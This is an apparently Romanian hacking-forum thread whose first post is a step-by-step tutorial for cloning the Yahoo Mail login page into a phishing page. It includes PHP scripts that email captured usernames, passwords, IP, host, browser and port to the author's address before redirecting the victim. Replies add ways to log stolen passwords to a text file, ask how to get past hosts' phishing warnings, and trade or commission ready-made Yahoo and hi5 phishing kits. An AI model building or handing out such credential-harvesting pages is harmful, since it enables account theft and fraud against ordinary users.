Proxenon Posted April 24, 2008 Report Posted April 24, 2008 Cum Sa Faci Un Scam Page1) Pentru inceput sa va zic cateva chesti :- tr sa aveti habar de notiuni html de baza {pe draq tr sa shti modifica unde va zic yo ) }- este foarte simplu- iti tr 2 siteuri pe net 1 pe lx iar celalalte 0server.com {sau orice site }2) Ce Este Un Scam Page ?Scam Page: este o pagina flasa, cu care poti afla date destul de inportante despre cineva{in acest tutorial voi prezenta un Yahoo Mail Scam Page}3) Hai Sa Facem Pagina Scam{partea I [faza in html]}acum trebuie sa intram pe site-ul respectiv(in exemplu nostru mail.yahoo.com), apasam ctrl + u {osa ne arate sursa pagini} iar noi nu tr decat sa selectam tot{absolut tot} si sa intram innotepad si dam paste.Noi am copiat pagina iar acum o sa trebuiasca sa cautam linia: <fieldset><legend>Login Form</legend><form method="post" action="[Only Registered And Activated Users Can See Links]" autocomplete="off"name="login_form"><input type="hidden" name=".tries" value="1"><input type="hidden" name=".src" value="ym"><input type="hidden" name=".md5" value=""><input type="hidden" name=".hash" value=""><input type="hidden" name=".js" value=""><input type="hidden" name=".last" value=""><input type="hidden" name="promo" value=""><input type="hidden" name=".intl" value="us"><input type="hidden" name=".bypass" value=""><input type="hidden" name=".partner" value=""><input type="hidden" name=".u" value="fvbi1kp2qhfik"><input type="hidden" name=".v" value="0"><input type="hidden" name=".challenge"value="EcsMm4_xIivGoDgBoxxTDyOfV4T9"><input type="hidden" name=".yplus" value=""><input type="hidden" name=".emailCode" value=""><input type="hidden" name="pkg" value=""><input type="hidden" name="stepid" value=""><input type="hidden" name=".ev" value=""><input type="hidden" name="hasMsgr" value="0"><input type="hidden" name=".chkP" value="Y"><input type="hidden" name=".done" value="[Only Registered And Activated Users Can See Links]"><input type="hidden" name=".pd" value="ym_ver%3d0">din ea tr sa shtergi <input type="hidden" name=".tries" value="1"><input type="hidden" name=".src" value="ym"><input type="hidden" name=".md5" value=""><input type="hidden" name=".hash" value=""><input type="hidden" name=".js" value=""><input type="hidden" name=".last" value=""><input type="hidden" name="promo" value=""><input type="hidden" name=".intl" value="us"><input type="hidden" name=".bypass" value=""><input type="hidden" name=".partner" value=""><input type="hidden" name=".u" value="fvbi1kp2qhfik"><input type="hidden" name=".v" value="0"><input type="hidden" name=".challenge"value="EcsMm4_xIivGoDgBoxxTDyOfV4T9"><input type="hidden" name=".yplus" value=""><input type="hidden" name=".emailCode" value=""><input type="hidden" name="pkg" value=""><input type="hidden" name="stepid" value=""><input type="hidden" name=".ev" value=""><input type="hidden" name="hasMsgr" value="0"><input type="hidden" name=".chkP" value="Y"><input type="hidden" name=".done" value="[Only Registered And Activated Users Can See Links]"><input type="hidden" name=".pd" value="ym_ver%3d0">iar la linia: <form method="post" action="[Only Registered And Activated Users Can See Links]"autocomplete="off" name="login_form"> tr scris in loc de[Only Registered And Activated Users Can See Links] tr sa scri[Only Registered And Activated Users Can See Links]p.s. ar fi de preferat sa shtergi si liniaCode:<script language="JavaScript"type="text/javascript">if(document.getElementById)document.getElementById('username').focus();</script>cam atata aicea in index.html4)s.php {partea ce iti trimite in email user, parola + ip(o sa mai potiadauga si alte date ... )}Code:<?php$ip = getenv("REMOTE_ADDR");$message .= "User : ".$_POST['login']."n";$message .= "PassWord: " .$_POST['passwd']."n";$recipient = "hackeru_dani @ yahoo.com";$subject = "New Losser";$headers = "From: ";$headers .= $_POST['eMailAdd']."n";$headers .= "MIME-Version: 1.0n";mail("$cc", "yahoo Info", $message);if (mail($recipient,$subject,$message,$headers)){header("Location: [Only Registered And Activated Users Can See Links]");}else{echo "ERROR! Please go back and try again.";}?>in loc de E-mail tr sa scrii email`u tauCam Asta a fost tot, acum poti sa iti faci scam pageacum celelate varabilitati din afara de ip :dar cum puteti si vedea pentru a aparea ip`u o fost scris $ip = getenv['REMOTE_ADDR']; , exactcam acelasi lutru tr si pentru restu nu conteaza daca scrie "$ip= ..." poate sa scrie "$fuck=..." dar conteaza mult ce scrie dupa egal, cam ce scrie dupa egal tr sa aiba forma$_SERVER['NUME_NUME']; unde nume poate fi :SERVER_ADDR - adresa serverului pe care e rulat scriptul[Only Registered And Activated Users Can See Links] - browserul folosit de clientREMOTE_HOST - ca REMOTE_ADDR, doar ca iti returneaza hostul, nu IP-ulREMOTE_PORT - portul pe partea de client care este folosit pentru comunicarea cu serverulPHP_AUTH_USER si PHP_AUTH_PW sunt folosite cand te autentifici prin apache ( .htaccess ). Itispune userul si parola care le-ai introdus in caseta de dialog.restu pot fi gasiteAICEAiti dau un ex pentru s.php cu cam multe prosti de alea:Code:<?php$ip = getenv("REMOTE_ADDR");$bro = $_SERVER['[Only Registered And Activated Users Can See Links]'];$host = $_SERVER['REMOTE_HOST'];$port = $_SERVER['REMOTE_PORT'];$message .= "User : ".$_POST['login']."n";$message .= "PassWord: " .$_POST['passwd']."n";$message .= "IP: ".$ip"n "$message .= "host: ".$host"n";$message .= "browserul: ".$bro"n";$message .= "PORT: ".$port"n";$recipient = "hackeru_dani @ yahoo.com";$subject = "New Losser";$headers = "From: ";$headers .= $_POST['eMailAdd']."n";$headers .= "MIME-Version: 1.0n";if (mail($recipient,$subject,$message,$headers)){header("Location: [Only Registered And Activated Users Can See Links]");}else{echo "ERROR! Please go back and try again.";}?>Credit:nu scria.. Quote
k7vlad Posted April 24, 2008 Report Posted April 24, 2008 Ok mi se pare foarte bun, dar am si eu o intrebare: cum se face legatura dintre index.html si s.php? Quote
Hertz Posted April 24, 2008 Report Posted April 24, 2008 Vezi ca sunt pachete de scamuri gata facute pe forum.Dai un search si nu te mai chinui anplea. Quote
inthel Posted April 28, 2008 Report Posted April 28, 2008 Ok mi se pare foarte bun, dar am si eu o intrebare: cum se face legatura dintre index.html si s.php?simplu : in tag-ul form exista action=zzz.phpzzz.php este fisierul php...asa se face legatura Quote
cyberking Posted May 1, 2008 Report Posted May 1, 2008 tutorial facut de Y2K din cate imi aduc aminte si dupa adresa de email ... Quote
alcol Posted May 1, 2008 Report Posted May 1, 2008 Numai copia ma atat ca ma dispera astia ca tine cand vad ca e prost si mai si semnalizeaza....dupa ce ca toti stiu ca tu copiezi tu mai si zici ca nu ai cui sa ii oferi credite...On: Tutorialul -> http://hackpedia.info/viewtopic.php?f=44&t=1477&p=8687&hilit=cum+faci+un+scam+page#p8687 Quote
andr3y Posted May 1, 2008 Report Posted May 1, 2008 mama cat a scris ala... simplu . iei sursa ... editezi la<form method="post" action="../login.php" ....salvezi in login.htmlapoi faci scriptu in php sa iti trimita mail salvezi in login.php si apoi le incarci pe un sar`var ... Quote
CODEX Posted May 1, 2008 Report Posted May 1, 2008 Eh aicia=i baiu ca eu numa nu am inteles din ce zice de mai sus ca trebuie doua siteuri pe lx si pe nush care si aia nu am inteles Da acum stiu oricum cum se face Quote
FrostWyrm Posted October 21, 2010 Report Posted October 21, 2010 Cum evit ca hostingul sa nu imi afiseze mesajul "Pagina suspecta de phishing....." inainte de incarcarea pagini ? Quote
wizardruls Posted October 22, 2010 Report Posted October 22, 2010 acum celelate varabilitati din afara de ip :dar cum puteti si vedea pentru a aparea ip`u o fost scris Te bate limba romana ...Care vrea un scam page de yahoo gata facut , astept PM .... Quote
Flubber Posted October 22, 2010 Report Posted October 22, 2010 Este din 2008 thread-ul iar voi l-ati inviat? Quote
IzCreative Posted October 22, 2010 Report Posted October 22, 2010 + ca mai sunt jde mii de astfel de threaduri . Quote
vale01vale Posted January 20, 2011 Report Posted January 20, 2011 imi lasa si mie cineva un pm pentru a ma ajuta sa fac un scam? Quote
razer_krait Posted January 20, 2011 Report Posted January 20, 2011 Uite ma tutorial: Ia d-aici.Sper ca stii engleza. Quote
vale01vale Posted January 20, 2011 Report Posted January 20, 2011 stiu engleza dar pagina pe care vreau sa o iau e mai securizata tehnicile astea merg pe orice fel de site?adica pot primi user si parola de pe orice site a carei pagina de loggin o copiez?mersi paxwn si razer Quote
razer_krait Posted January 20, 2011 Report Posted January 20, 2011 Da ma , dai file=>save page as=>index.html.Apoi click dreapta=>NewTextDocument=>phish.php si acolo scrii scriptul.Click dreapta=>NewTextDocument list.txt , ei si modific ce-ti zice ala acolo , iar apoi ar trebui sa-ti salveze fiecare parola in list.txt ;)Bafta.Eu am deja pentru hi5 phish daca vrei ti-l dau.... 1 Quote
Hellraiser Posted January 27, 2011 Report Posted January 27, 2011 interesant..mai este si threatul lui sosetutza Quote
hirosima Posted January 27, 2011 Report Posted January 27, 2011 cu aceasta ocazie pun ?i eu o întrebare. Am nevoie de un domeniu free cu mail, sa pot uploada scam page-ul. Astept niste linkuri free probate care functioneaza.multumire Quote
gheo19 Posted January 29, 2011 Report Posted January 29, 2011 Sal tuturor...Am nevoie de un scam de hi5 sa fie facut cu redirect la pacina originala aveam unu mai demult care mergea foarte bine ....Cine are timp sa imi faca unul asa calumea sa fie cat mai aproape de original:)) platesc bine ... astept sa imi scrie pe Pm ..ms mult fratilor Quote